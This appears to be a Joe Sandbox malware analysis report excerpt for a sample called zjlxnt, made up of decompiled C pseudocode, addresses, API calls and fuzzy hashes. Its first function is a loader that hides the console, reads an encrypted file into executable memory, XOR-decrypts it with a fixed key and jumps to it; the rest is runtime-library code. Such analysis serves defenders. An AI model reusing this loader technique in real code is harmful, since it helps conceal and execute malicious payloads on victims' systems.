                                                          0x00407705
                                                          0x0040770f
                                                          0x00407714
                                                          0x00407717
                                                          0x00407726
                                                          0x0040772a
                                                          0x0040772d
                                                          0x0040772f
                                                          0x00407731
                                                          0x00407733
                                                          0x00407738
                                                          0x0040773a
                                                          0x0040773e
                                                          0x0040773f
                                                          0x00407745
                                                          0x0040774f
                                                          0x00407750
                                                          0x00407755
                                                          0x00407758
                                                          0x00407767
                                                          0x0040776b
                                                          0x0040776e
                                                          0x00407770
                                                          0x00407772
                                                          0x00407774
                                                          0x00407776
                                                          0x0040777c
                                                          0x0040777c
                                                          0x0040777d
                                                          0x0040778c
                                                          0x0040778d
                                                          0x0040778d
                                                          0x00407774
                                                          0x00407770
                                                          0x00407758
                                                          0x00407733
                                                          0x0040772f
                                                          0x00407717
                                                          0x004076f0
                                                          0x004076e8
                                                          0x00407793
                                                          0x00407799
                                                          0x0040779b
                                                          0x0040780c
                                                          0x0040780c
                                                          0x00407810
                                                          0x00407817
                                                          0x0040781e
                                                          0x00407824
                                                          0x00407826
                                                          0x00407884
                                                          0x00407884
                                                          0x0040788c
                                                          0x0040788d
                                                          0x0040788f
                                                          0x004078a8
                                                          0x004078ab
                                                          0x004077e8
                                                          0x004077e9
                                                          0x00000000
                                                          0x004077ee
                                                          0x004078b1
                                                          0x00000000
                                                          0x004078b1
                                                          0x00407896
                                                          0x004078a1
                                                          0x00000000
                                                          0x004078a1
                                                          0x00407828
                                                          0x0040782b
                                                          0x0040782e
                                                          0x00000000
                                                          0x00000000
                                                          0x00407830
                                                          0x00407830
                                                          0x00407833
                                                          0x00407836
                                                          0x00407839
                                                          0x00407840
                                                          0x00407845
                                                          0x00407847
                                                          0x0040784b
                                                          0x00407866
                                                          0x0040786a
                                                          0x0040786b
                                                          0x0040786e
                                                          0x00407871
                                                          0x0040787d
                                                          0x00407873
                                                          0x00407873
                                                          0x00407873
                                                          0x0040784d
                                                          0x0040784d
                                                          0x0040784d
                                                          0x00407858
                                                          0x0040785d
                                                          0x00407860
                                                          0x00407860
                                                          0x00000000
                                                          0x00407845
                                                          0x004077a0
                                                          0x004077a3
                                                          0x004077aa
                                                          0x004077af
                                                          0x00000000
                                                          0x00000000
                                                          0x004077b8
                                                          0x004077be
                                                          0x004077c0
                                                          0x00000000
                                                          0x00000000
                                                          0x004077c2
                                                          0x004077c6
                                                          0x00000000
                                                          0x00000000
                                                          0x004077d1
                                                          0x004077d8
                                                          0x004077de
                                                          0x004077e0
                                                          0x00407804
                                                          0x00407807
                                                          0x00000000
                                                          0x00407807
                                                          0x004077e2
                                                          0x00000000
                                                          0x00407677
                                                          0x0040767c
                                                          0x00407687
                                                          0x004077ef
                                                          0x004077ef
                                                          0x004077ef
                                                          0x004077f2
                                                          0x004077f3
                                                          0x004077f9
                                                          0x00000000
                                                          0x004077fb
                                                          0x00407675
                                                          0x0040764a
                                                          0x00407611
                                                          0x00407614
                                                          0x0040763a
                                                          0x0040763a
                                                          0x0040763c
                                                          0x0040763f
                                                          0x00000000
                                                          0x0040763f
                                                          0x00407618
                                                          0x0040761a
                                                          0x0040761c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040761c
                                                          0x004075c8
                                                          0x004075cd
                                                          0x004075d5
                                                          0x00000000
                                                          0x00407562
                                                          0x00407567
                                                          0x0040756a
                                                          0x0040756f
                                                          0x004078d4
                                                          0x004078d4
                                                          0x004078d7
                                                          0x004078da
                                                          0x004078da

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 914d88a9dc23a28d54640f7483cad62583e78d6f0f5440e0da4bd7054705a808
                                                          • Instruction ID: 4cb50bf577c926ab878105439c0c79d212d035fb132a4d6a04cd545261c119c9
                                                          • Opcode Fuzzy Hash: 914d88a9dc23a28d54640f7483cad62583e78d6f0f5440e0da4bd7054705a808
                                                          • Instruction Fuzzy Hash: C5B1D471E08245ABDB01EF69C844BAE7BB1BF45318F14817AE501B73D2C778B941CB6A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 77%
                                                          			E00401000(intOrPtr _a8) {
                                                          				signed int _v8;
                                                          				intOrPtr _v12;
                                                          				long _v16;
                                                          				void* _v20;
                                                          				char* _v24;
                                                          				struct HWND__* _t32;
                                                          				intOrPtr _t36;
                                                          				long _t39;
                                                          				void* _t42;
                                                          				void* _t51;
                                                          				void* _t68;
                                                          
                                                          				_v8 = 0;
                                                          				_v16 = 0;
                                                          				_v24 = "248058040134";
                                                          				__imp__GetConsoleWindow(); // executed
                                                          				ShowWindow(_t32, 0); // executed
                                                          				_t36 = E00404813( *((intOrPtr*)(_a8 + (4 << 0))), 0x4188c0); // executed
                                                          				_v12 = _t36;
                                                          				E00404B74(_t51,  *((intOrPtr*)(_a8 + (4 << 0))), _t68, _v12, 0, 2); // executed
                                                          				_t39 = E0040472C(_t51,  *((intOrPtr*)(_a8 + (4 << 0))), _t68, _v12); // executed
                                                          				_v16 = _t39;
                                                          				E00404B74(_t51, _v12, _t68, _v12, 0, 0); // executed
                                                          				_t42 = VirtualAlloc(0, _v16, 0x3000, 0x40); // executed
                                                          				_v20 = _t42;
                                                          				E00404D87(_v20, _v16, 1, _v12); // executed
                                                          				while(_v8 < _v16) {
                                                          					asm("cdq");
                                                          					 *(_v20 + _v8) =  *(_v20 + _v8) & 0x000000ff ^ _v24[_v8 % 0xc] & 0x000000ff;
                                                          					_v8 = _v8 + 1;
                                                          				}
                                                          				goto __eax;
                                                          			}














                                                          0x00401006
                                                          0x0040100d
                                                          0x00401014
                                                          0x0040101d
                                                          0x00401024
                                                          0x0040103e
                                                          0x00401046
                                                          0x00401051
                                                          0x0040105d
                                                          0x00401065
                                                          0x00401070
                                                          0x00401085
                                                          0x0040108b
                                                          0x0040109c
                                                          0x004010a4
                                                          0x004010af
                                                          0x004010cf
                                                          0x004010d7
                                                          0x004010d7
                                                          0x004010df

                                                          APIs
                                                          • GetConsoleWindow.KERNELBASE(00000000), ref: 0040101D
                                                          • ShowWindow.USER32(00000000), ref: 00401024
                                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 00401085
                                                          • __fread_nolock.LIBCMT ref: 0040109C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: Window$AllocConsoleShowVirtual__fread_nolock
                                                          • String ID: 248058040134
                                                          • API String ID: 494509129-1212554544
                                                          • Opcode ID: 19d58178e4c398fc293a5b7b4affa2899e16e4478cbb19e134bbc2de42f9a9e8
                                                          • Instruction ID: d385b19f01a63246e9d2131daafd262a5444be4d06afd6f0719cf4670e1aff75
                                                          • Opcode Fuzzy Hash: 19d58178e4c398fc293a5b7b4affa2899e16e4478cbb19e134bbc2de42f9a9e8
                                                          • Instruction Fuzzy Hash: 2D214CB5E00208FFDB04DBD4C851FEEBBB5AF84304F1084A9E611AB2D1D779AA40CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 191 407991-407996 192 407998-4079b0 191->192 193 4079b2-4079b6 192->193 194 4079be-4079c7 192->194 193->194 195 4079b8-4079bc 193->195 196 4079d9 194->196 197 4079c9-4079cc 194->197 198 407a33-407a37 195->198 201 4079db-4079e8 GetStdHandle 196->201 199 4079d5-4079d7 197->199 200 4079ce-4079d3 197->200 198->192 202 407a3d-407a40 198->202 199->201 200->201 203 407a15-407a27 201->203 204 4079ea-4079ec 201->204 203->198 205 407a29-407a2c 203->205 204->203 206 4079ee-4079f7 GetFileType 204->206 205->198 206->203 207 4079f9-407a02 206->207 208 407a04-407a08 207->208 209 407a0a-407a0d 207->209 208->198 209->198 210 407a0f-407a13 209->210 210->198
                                                          C-Code - Quality: 86%
                                                          			E00407991() {
                                                          				signed int _t20;
                                                          				signed int _t22;
                                                          				long _t23;
                                                          				signed char _t25;
                                                          				void* _t28;
                                                          				signed int _t31;
                                                          				void* _t33;
                                                          
                                                          				_t31 = 0;
                                                          				do {
                                                          					_t20 = _t31 & 0x0000003f;
                                                          					_t33 = _t20 * 0x38 +  *((intOrPtr*)(0x418ec0 + (_t31 >> 6) * 4));
                                                          					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
                                                          						 *(_t33 + 0x28) = 0x81;
                                                          						_t22 = _t31;
                                                          						if(_t22 == 0) {
                                                          							_push(0xfffffff6);
                                                          						} else {
                                                          							if(_t22 == 1) {
                                                          								_push(0xfffffff5);
                                                          							} else {
                                                          								_push(0xfffffff4);
                                                          							}
                                                          						}
                                                          						_pop(_t23);
                                                          						_t28 = GetStdHandle(_t23);
                                                          						if(_t28 == 0xffffffff || _t28 == 0) {
                                                          							L16:
                                                          							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
                                                          							 *(_t33 + 0x18) = 0xfffffffe;
                                                          							_t20 =  *0x418eb0; // 0x5cc7f8
                                                          							if(_t20 != 0) {
                                                          								_t20 =  *(_t20 + _t31 * 4);
                                                          								 *(_t20 + 0x10) = 0xfffffffe;
                                                          							}
                                                          							goto L18;
                                                          						} else {
                                                          							_t25 = GetFileType(_t28); // executed
                                                          							if(_t25 == 0) {
                                                          								goto L16;
                                                          							} else {
                                                          								_t20 = _t25 & 0x000000ff;
                                                          								 *(_t33 + 0x18) = _t28;
                                                          								if(_t20 != 2) {
                                                          									if(_t20 == 3) {
                                                          										 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
                                                          									}
                                                          								} else {
                                                          									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
                                                          								}
                                                          								goto L18;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
                                                          					}
                                                          					L18:
                                                          					_t31 = _t31 + 1;
                                                          				} while (_t31 != 3);
                                                          				return _t20;
                                                          			}










                                                          0x00407996
                                                          0x00407998
                                                          0x0040799c
                                                          0x004079a5
                                                          0x004079b0
                                                          0x004079c0
                                                          0x004079c4
                                                          0x004079c7
                                                          0x004079d9
                                                          0x004079c9
                                                          0x004079cc
                                                          0x004079d5
                                                          0x004079ce
                                                          0x004079d1
                                                          0x004079d1
                                                          0x004079cc
                                                          0x004079db
                                                          0x004079e3
                                                          0x004079e8
                                                          0x00407a15
                                                          0x00407a15
                                                          0x00407a19
                                                          0x00407a20
                                                          0x00407a27
                                                          0x00407a29
                                                          0x00407a2c
                                                          0x00407a2c
                                                          0x00000000
                                                          0x004079ee
                                                          0x004079ef
                                                          0x004079f7
                                                          0x00000000
                                                          0x004079f9
                                                          0x004079f9
                                                          0x004079fc
                                                          0x00407a02
                                                          0x00407a0d
                                                          0x00407a0f
                                                          0x00407a0f
                                                          0x00407a04
                                                          0x00407a04
                                                          0x00407a04
                                                          0x00000000
                                                          0x00407a02
                                                          0x004079f7
                                                          0x004079b8
                                                          0x004079b8
                                                          0x004079b8
                                                          0x00407a33
                                                          0x00407a33
                                                          0x00407a34
                                                          0x00407a40

                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 004079DD
                                                          • GetFileType.KERNELBASE(00000000), ref: 004079EF
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: FileHandleType
                                                          • String ID:
                                                          • API String ID: 3000768030-0
                                                          • Opcode ID: d6619b40f6803693720ade963561a5f1bcab158e0136fddc890cd8689d10b880
                                                          • Instruction ID: 56ab254fcbb807650b89c38ae31a0edba08049fece1e2b1d2f75ff97b3a1e88c
                                                          • Opcode Fuzzy Hash: d6619b40f6803693720ade963561a5f1bcab158e0136fddc890cd8689d10b880
                                                          • Instruction Fuzzy Hash: 4111EB71E0C74146D7304E3E8C886277A959B96330B38073BE1B6E66F1C338F942969B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 211 406833-40684b call 40a3b3 214 406861-406877 SetFilePointerEx 211->214 215 40684d-406854 211->215 217 406879-40688a GetLastError call 407b33 214->217 218 40688c-406896 214->218 216 40685b-40685f 215->216 219 4068b2-4068b5 216->219 217->216 218->216 221 406898-4068ad 218->221 221->219
                                                          C-Code - Quality: 88%
                                                          			E00406833(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                          				signed int _v8;
                                                          				void* _v12;
                                                          				void* _t19;
                                                          				int _t20;
                                                          				signed int _t23;
                                                          				intOrPtr _t26;
                                                          				signed int _t37;
                                                          				signed int _t38;
                                                          				signed int _t41;
                                                          
                                                          				_t41 = _a4;
                                                          				_push(_t37);
                                                          				_t19 = E0040A3B3(_t41);
                                                          				_t38 = _t37 | 0xffffffff;
                                                          				if(_t19 != _t38) {
                                                          					_push(_a16);
                                                          					_t20 = SetFilePointerEx(_t19, _a8, _a12,  &_v12); // executed
                                                          					if(_t20 != 0) {
                                                          						if((_v12 & _v8) == _t38) {
                                                          							goto L2;
                                                          						} else {
                                                          							_t23 = _v12;
                                                          							_t44 = (_t41 & 0x0000003f) * 0x38;
                                                          							 *( *((intOrPtr*)(0x418ec0 + (_t41 >> 6) * 4)) + _t44 + 0x28) =  *( *((intOrPtr*)(0x418ec0 + (_t41 >> 6) * 4)) + 0x28 + (_t41 & 0x0000003f) * 0x38) & 0x000000fd;
                                                          						}
                                                          					} else {
                                                          						E00407B33(GetLastError(), _a20);
                                                          						goto L2;
                                                          					}
                                                          				} else {
                                                          					_t26 = _a20;
                                                          					 *((char*)(_t26 + 0x1c)) = 1;
                                                          					 *((intOrPtr*)(_t26 + 0x18)) = 9;
                                                          					L2:
                                                          					_t23 = _t38;
                                                          				}
                                                          				return _t23;
                                                          			}












                                                          0x0040683b
                                                          0x0040683e
                                                          0x00406840
                                                          0x00406845
                                                          0x0040684b
                                                          0x00406861
                                                          0x0040686f
                                                          0x00406877
                                                          0x00406896
                                                          0x00000000
                                                          0x00406898
                                                          0x00406898
                                                          0x004068a3
                                                          0x004068ad
                                                          0x004068ad
                                                          0x00406879
                                                          0x00406883
                                                          0x00000000
                                                          0x00406889
                                                          0x0040684d
                                                          0x0040684d
                                                          0x00406850
                                                          0x00406854
                                                          0x0040685b
                                                          0x0040685b
                                                          0x0040685d
                                                          0x004068b5

                                                          APIs
                                                          • SetFilePointerEx.KERNELBASE(00000000,00000000,00416698,00401056,00000002,00401056,00000000,?,?,?,004068FD,00000000,?,00401056,00000002,00416698), ref: 0040686F
                                                          • GetLastError.KERNEL32(00401056,?,?,?,004068FD,00000000,?,00401056,00000002,00416698,00000000,00401056,00000000,00416698,0000000C,00404B9C), ref: 0040687C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastPointer
                                                          • String ID:
                                                          • API String ID: 2976181284-0
                                                          • Opcode ID: e1601f74066faa489daaaf2f2242b242259d0dd987624998d1478e1b725e3438
                                                          • Instruction ID: b1cc03f9d35e277b3be25256282a74e8f5cda56cf8101fb1f838c35d0e517a5e
                                                          • Opcode Fuzzy Hash: e1601f74066faa489daaaf2f2242b242259d0dd987624998d1478e1b725e3438
                                                          • Instruction Fuzzy Hash: 48016B33A00114AFCB059F19CC05C9E3F6ADB84320B254129F812EB2E0E735ED518B94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 223 4040d2-4040df 224 4040e1-404104 call 4064ea 223->224 225 404109-40411d call 4065ab 223->225 230 404270-404272 224->230 231 404122-40412b call 4068b6 225->231 232 40411f 225->232 234 404130-40413f 231->234 232->231 235 404141 234->235 236 40414f-404158 234->236 237 404147-404149 235->237 238 404219-40421e 235->238 239 40415a-404167 236->239 240 40416c-4041a0 236->240 237->236 237->238 241 40426e-40426f 238->241 242 40426c 239->242 243 4041a2-4041ac 240->243 244 4041fd-404209 240->244 241->230 242->241 247 4041d3-4041df 243->247 248 4041ae-4041ba 243->248 245 404220-404223 244->245 246 40420b-404212 244->246 250 404226-40422e 245->250 246->238 247->245 249 4041e1-4041fb call 40466d 247->249 248->247 251 4041bc-4041ce call 4044c2 248->251 249->250 254 404230-404236 250->254 255 40426a 250->255 251->241 258 404238-40424c call 4042f7 254->258 259 40424e-404252 254->259 255->242 258->241 260 404254-404262 call 410b40 259->260 261 404265-404267 259->261 260->261 261->255
                                                          C-Code - Quality: 93%
                                                          			E004040D2(signed int __edx, void* __esi, intOrPtr* _a4, signed int _a8) {
                                                          				signed int _v8;
                                                          				char _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				signed int _v24;
                                                          				signed int _v28;
                                                          				void* __edi;
                                                          				void* __ebp;
                                                          				signed int _t70;
                                                          				signed int _t71;
                                                          				signed char _t73;
                                                          				signed int _t75;
                                                          				signed char _t82;
                                                          				signed int _t85;
                                                          				signed char _t86;
                                                          				signed int _t87;
                                                          				intOrPtr _t88;
                                                          				void* _t89;
                                                          				intOrPtr _t90;
                                                          				signed int _t93;
                                                          				signed int _t97;
                                                          				signed int _t99;
                                                          				intOrPtr _t102;
                                                          				signed int _t103;
                                                          				signed int _t104;
                                                          				intOrPtr* _t105;
                                                          				signed char _t106;
                                                          				signed int _t107;
                                                          				signed int _t109;
                                                          				signed int _t112;
                                                          				signed int _t117;
                                                          				intOrPtr* _t118;
                                                          				void* _t121;
                                                          				void* _t122;
                                                          
                                                          				_t116 = __esi;
                                                          				_t108 = __edx;
                                                          				if(_a4 != 0) {
                                                          					_t70 = E004065AB(_a4);
                                                          					_t102 = _a4;
                                                          					_t97 = _t70;
                                                          					__eflags =  *(_t102 + 8);
                                                          					if( *(_t102 + 8) < 0) {
                                                          						 *(_t102 + 8) = 0;
                                                          					}
                                                          					_t71 = E004068B6(_t97, 0, 0, 1, _a8); // executed
                                                          					_t103 = _t108;
                                                          					_t122 = _t121 + 0x14;
                                                          					_v8 = _t103;
                                                          					_t117 = _t71;
                                                          					_v28 = _t117;
                                                          					__eflags = _t103;
                                                          					if(__eflags > 0) {
                                                          						L7:
                                                          						_t73 =  *(_a4 + 0xc);
                                                          						__eflags = _t73 & 0x000000c0;
                                                          						if((_t73 & 0x000000c0) != 0) {
                                                          							_t75 = _t97 >> 6;
                                                          							_t104 = (_t97 & 0x0000003f) * 0x38;
                                                          							_v16 = _t75;
                                                          							_v20 = _t104;
                                                          							_t105 = _a4;
                                                          							_v12 =  *((intOrPtr*)(_t104 +  *((intOrPtr*)(0x418ec0 + _t75 * 4)) + 0x29));
                                                          							_t106 =  *(_t105 + 0xc);
                                                          							asm("cdq");
                                                          							_t99 =  *_t105 -  *((intOrPtr*)(_t105 + 4));
                                                          							_v24 = _t108;
                                                          							__eflags = _t106 & 0x00000003;
                                                          							if((_t106 & 0x00000003) == 0) {
                                                          								_t82 =  *(_a4 + 0xc) >> 2;
                                                          								__eflags = _t82 & 0x00000001;
                                                          								if((_t82 & 0x00000001) != 0) {
                                                          									L18:
                                                          									_t118 = _a4;
                                                          									_t103 = _v24;
                                                          									L19:
                                                          									_t109 = _v28;
                                                          									__eflags = _t109 | _v8;
                                                          									if((_t109 | _v8) == 0) {
                                                          										L25:
                                                          										_t85 = _t99;
                                                          										L26:
                                                          										goto L27;
                                                          									}
                                                          									_t86 =  *(_t118 + 0xc);
                                                          									__eflags = _t86 & 0x00000001;
                                                          									if((_t86 & 0x00000001) == 0) {
                                                          										__eflags = _v12 - 1;
                                                          										if(_v12 == 1) {
                                                          											_t87 = E00410B40(_t99, _t103, 2, 0);
                                                          											_t103 = _t109;
                                                          											_t99 = _t87;
                                                          											_t109 = _v28;
                                                          										}
                                                          										_t99 = _t99 + _t109;
                                                          										asm("adc ecx, [ebp-0x4]");
                                                          										goto L25;
                                                          									}
                                                          									_t85 = E004042F7(_a4, _t109, _v8, _t99, _t103, _a8);
                                                          									goto L27;
                                                          								}
                                                          								_t71 = _a8;
                                                          								 *((char*)(_t71 + 0x1c)) = 1;
                                                          								 *((intOrPtr*)(_t71 + 0x18)) = 0x16;
                                                          								goto L17;
                                                          							}
                                                          							__eflags = _v12 - 1;
                                                          							_t107 = _v16;
                                                          							_t112 = _v20;
                                                          							if(_v12 != 1) {
                                                          								L13:
                                                          								_t88 =  *((intOrPtr*)(0x418ec0 + _t107 * 4));
                                                          								__eflags =  *((char*)(_t112 + _t88 + 0x28));
                                                          								if( *((char*)(_t112 + _t88 + 0x28)) >= 0) {
                                                          									goto L18;
                                                          								}
                                                          								_t118 = _a4;
                                                          								_t89 = E0040466D( *((intOrPtr*)(_t118 + 4)),  *_t118, _v12);
                                                          								_t103 = _v24;
                                                          								_t122 = _t122 + 0xc;
                                                          								_t99 = _t99 + _t89;
                                                          								asm("adc ecx, edx");
                                                          								goto L19;
                                                          							}
                                                          							_t90 =  *((intOrPtr*)(0x418ec0 + _t107 * 4));
                                                          							__eflags =  *(_t112 + _t90 + 0x2d) & 0x00000002;
                                                          							if(( *(_t112 + _t90 + 0x2d) & 0x00000002) == 0) {
                                                          								goto L13;
                                                          							}
                                                          							_t85 = E004044C2(0, _t117, _a4, _t117, _v8, _a8);
                                                          							goto L27;
                                                          						}
                                                          						asm("cdq");
                                                          						_t85 = _t117 -  *((intOrPtr*)(_a4 + 8));
                                                          						asm("sbb ecx, edx");
                                                          						goto L26;
                                                          					} else {
                                                          						if(__eflags < 0) {
                                                          							L17:
                                                          							_t85 = _t71 | 0xffffffff;
                                                          							L27:
                                                          							return _t85;
                                                          						}
                                                          						__eflags = _t117;
                                                          						if(_t117 < 0) {
                                                          							goto L17;
                                                          						}
                                                          						goto L7;
                                                          					}
                                                          				}
                                                          				_t93 = _a8;
                                                          				 *((char*)(_t93 + 0x1c)) = 1;
                                                          				 *((intOrPtr*)(_t93 + 0x18)) = 0x16;
                                                          				return E004064EA(0, __esi, 0, 0, 0, 0, 0, _t93) | 0xffffffff;
                                                          			}





































                                                          0x004040d2
                                                          0x004040d2
                                                          0x004040df
                                                          0x0040410d
                                                          0x00404113
                                                          0x00404118
                                                          0x0040411a
                                                          0x0040411d
                                                          0x0040411f
                                                          0x0040411f
                                                          0x0040412b
                                                          0x00404130
                                                          0x00404132
                                                          0x00404135
                                                          0x00404138
                                                          0x0040413a
                                                          0x0040413d
                                                          0x0040413f
                                                          0x0040414f
                                                          0x00404152
                                                          0x00404156
                                                          0x00404158
                                                          0x00404171
                                                          0x00404174
                                                          0x00404177
                                                          0x00404181
                                                          0x00404188
                                                          0x0040418b
                                                          0x00404193
                                                          0x00404196
                                                          0x00404197
                                                          0x00404199
                                                          0x0040419d
                                                          0x004041a0
                                                          0x00404204
                                                          0x00404207
                                                          0x00404209
                                                          0x00404220
                                                          0x00404220
                                                          0x00404223
                                                          0x00404226
                                                          0x00404226
                                                          0x0040422b
                                                          0x0040422e
                                                          0x0040426a
                                                          0x0040426a
                                                          0x0040426c
                                                          0x00000000
                                                          0x0040426c
                                                          0x00404230
                                                          0x00404234
                                                          0x00404236
                                                          0x0040424e
                                                          0x00404252
                                                          0x00404259
                                                          0x0040425e
                                                          0x00404260
                                                          0x00404262
                                                          0x00404262
                                                          0x00404265
                                                          0x00404267
                                                          0x00000000
                                                          0x00404267
                                                          0x00404244
                                                          0x00000000
                                                          0x00404249
                                                          0x0040420b
                                                          0x0040420e
                                                          0x00404212
                                                          0x00000000
                                                          0x00404212
                                                          0x004041a2
                                                          0x004041a6
                                                          0x004041a9
                                                          0x004041ac
                                                          0x004041d3
                                                          0x004041d3
                                                          0x004041da
                                                          0x004041df
                                                          0x00000000
                                                          0x00000000
                                                          0x004041e1
                                                          0x004041ec
                                                          0x004041f1
                                                          0x004041f4
                                                          0x004041f7
                                                          0x004041f9
                                                          0x00000000
                                                          0x004041f9
                                                          0x004041ae
                                                          0x004041b5
                                                          0x004041ba
                                                          0x00000000
                                                          0x00000000
                                                          0x004041c6
                                                          0x00000000
                                                          0x004041cb
                                                          0x00404160
                                                          0x00404163
                                                          0x00404165
                                                          0x00000000
                                                          0x00404141
                                                          0x00404141
                                                          0x00404219
                                                          0x00404219
                                                          0x0040426e
                                                          0x00000000
                                                          0x0040426f
                                                          0x00404147
                                                          0x00404149
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404149
                                                          0x0040413f
                                                          0x004040e1
                                                          0x004040ec
                                                          0x004040f0
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a4e8d6994717699f0e94329a8b457d3c1a343de9141e2040c0d32cd79e4d6c63
                                                          • Instruction ID: 23aaa3b16dac83aa37d476407278702b0cfa40bdaf492c72ffc7257fd558bb22
                                                          • Opcode Fuzzy Hash: a4e8d6994717699f0e94329a8b457d3c1a343de9141e2040c0d32cd79e4d6c63
                                                          • Instruction Fuzzy Hash: 1851F7B0A00204AFCF14CF58CC44AAA7BB1EFD5354F2481AEF909AB392D3759D81CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 266 407f0d-407f33 call 407ce3 269 407f35-407f47 call 40c397 266->269 270 407f8c-407f8f 266->270 272 407f4c-407f51 269->272 272->270 273 407f53-407f8b 272->273
                                                          C-Code - Quality: 72%
                                                          			E00407F0D(void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                          				char _v8;
                                                          				char _v12;
                                                          				void* _v16;
                                                          				intOrPtr _v20;
                                                          				char _v32;
                                                          				void* _t26;
                                                          
                                                          				E00407CE3(__ecx,  &_v32, _a8);
                                                          				asm("movsd");
                                                          				asm("movsd");
                                                          				asm("movsd");
                                                          				if(_v12 == 0) {
                                                          					L3:
                                                          					return 0;
                                                          				} else {
                                                          					_t26 = E0040C397( &_v8, _a4, _v20, _a12, 0x180); // executed
                                                          					if(_t26 != 0) {
                                                          						goto L3;
                                                          					} else {
                                                          						 *0x418eb4 =  *0x418eb4 + 1;
                                                          						asm("lock or [eax], ecx");
                                                          						 *((intOrPtr*)(_a16 + 8)) = 0;
                                                          						 *((intOrPtr*)(_a16 + 0x1c)) = 0;
                                                          						 *((intOrPtr*)(_a16 + 4)) = 0;
                                                          						 *_a16 = 0;
                                                          						 *((intOrPtr*)(_a16 + 0x10)) = _v8;
                                                          						return _a16;
                                                          					}
                                                          				}
                                                          			}









                                                          0x00407f1e
                                                          0x00407f2a
                                                          0x00407f2b
                                                          0x00407f2c
                                                          0x00407f33
                                                          0x00407f8c
                                                          0x00407f8f
                                                          0x00407f35
                                                          0x00407f47
                                                          0x00407f51
                                                          0x00000000
                                                          0x00407f53
                                                          0x00407f56
                                                          0x00407f62
                                                          0x00407f6a
